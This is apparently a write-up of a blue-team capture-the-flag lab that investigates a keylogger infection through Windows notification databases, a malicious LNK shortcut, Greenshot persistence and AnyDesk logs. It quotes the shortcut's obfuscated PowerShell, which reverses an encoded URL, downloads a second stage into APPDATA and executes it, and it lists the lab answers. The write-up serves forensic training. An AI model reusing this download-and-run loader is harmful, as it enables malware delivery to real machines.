KrakenKeylogger

Link to lab : https://cyberdefenders.org/blueteam-ctf-challenges/krakenkeylogger/

Q1 What is the the web messaging app the employee used to talk to the attacker?

Q2 What is the password for the protected ZIP file sent by the attacker to the employee?

This is about analyze window artifacts , evidence is in windows 10 .

From education explain :

Theory : Windows artifacts, including notifications, are remnants of user activities and system operations. These artifacts reside in various system files and registry entries, providing insights into the behavior of both users and applications on the device.

Location: C:\Users\$username\AppData\Local\Microsoft\Windows\Notifications.

Move to \Users\OMEN\AppData\Local\Microsoft\Windows\Notifications

At here contain file .db -> this can load and anlyze with DB Browser

By view the file .db in DB Browser we can check each table ,might look at Notification -> contain sensitive data and answer we need for questions 1 and 2 .

Answer : Telegram , @1122d

Q3 What domain did the attacker use to download the second stage of the malware?

Summary from Education :

LNK files, known as shortcuts, have become a sophisticated tool for cybercriminals -> aim to analyze file LNK might contain PowerShell code could be harm or vulnerable which had embedded in the file.

LNK compoments :

  • SHELL_LINK_HEADER: Contains essential information for the file, including flags indicating which structures are present.

  • LINKTARGET_IDLIST: Specifies the target of the link.

  • LINKINFO: Provides location information about the link target.

  • STRING_DATA: Contains path and interface information for the link target.

  • EXTRA_DATA: Holds additional information, like environment variable paths.

Finding around the folder -> folder contain file LNK need to analyze C:\Users\Kayiyan\Desktop\CyberDef\c119-KrakenKeyLogger\challenge\Users\OMEN\Downloads\project templet test

Use Strings command on this file might find the Powershell code in it or use Tools from ZimmermanTools is LECmd

Summary analyzing code : 

nvRClWiAJT($OnUPXhNfGyEh): This function takes a string as an argument and reverses it. The reversed string is returned.

sDjLksFILdkrdR($OnUPXhNfGyEh): This function takes a string as an argument, reverses it using the nvRClWiAJT function, and then reverses every two characters in the reversed string. If there's an exception (likely because the string length is odd), it reverses the last character. The final string is returned.

$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht': This line calls the sDjLksFILdkrdR function with a reversed URL as an argument. The result is a correctly ordered URL.

$cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1]: This line constructs a local file path by combining the APPDATA environment variable with the last part of the URL (which is likely the filename).

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12: This line sets the security protocol for network connections to TLS 1.2.

$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing: This line downloads the file from the URL using the wget command and stores the content in a variable.

[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi): This line writes the downloaded content to the local file path. 

& $cDkdhkGBtl: This line executes the downloaded file.

So basicly just print out the $NpzibtULgyi could get the link we need for the question and the last 2 command we can delete it or comment out for not write the data into other file .

Answer : masherofmasters.cyou

Q4 What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence?

Q5 What is the complete path of the malicious file that the attacker used to achieve persistence?

Knowledge : LOLAPPS and Persistence Techniques

Website for identifying : https://lolapps-project.github.io/

For short :

Attackers use "Living Off the Land Applications" (LOLAPPS) and persistence techniques to exploit systems.

LOLAPPS are legitimate tools already present on systems, which attackers exploit for malicious purposes without installing new malware -> This makes detection harder.

Using LOLAPPS for persistence is stealthy, as it utilizes trusted tools for malicious activities.

From the link given for identifying -> move to analyze Greenshot which had given

Answer : jlhgfjhdflghjhuhuh , C:\Users\OMEN\AppData\Local\Temp\templet.lnk

Q6 What is the name of the application the attacker utilized for data exfiltration?

Q7 What is the IP address of the attacker?

Risk of using remote desktop applications

From Education :

RDP software can contain some risk like :

  • Unauthorized Access: If not properly secured, attackers can gain control over a victim's system.

  • Data Exfiltration: Malicious actors can use these tools to stealthily extract sensitive information from an organization's network.

For this -> analyze file ad.trace could help find the sensitive or untrusted data :

First in the mention we can know the app is AnyDesk and so on find the IP address related to attacker in the ad.trace :

This is External address like mention -> related to Attacker IP address

Answer : AnyDesk , 77.232.122.31

PreviousFlare-on 1NextAzurePot

Last updated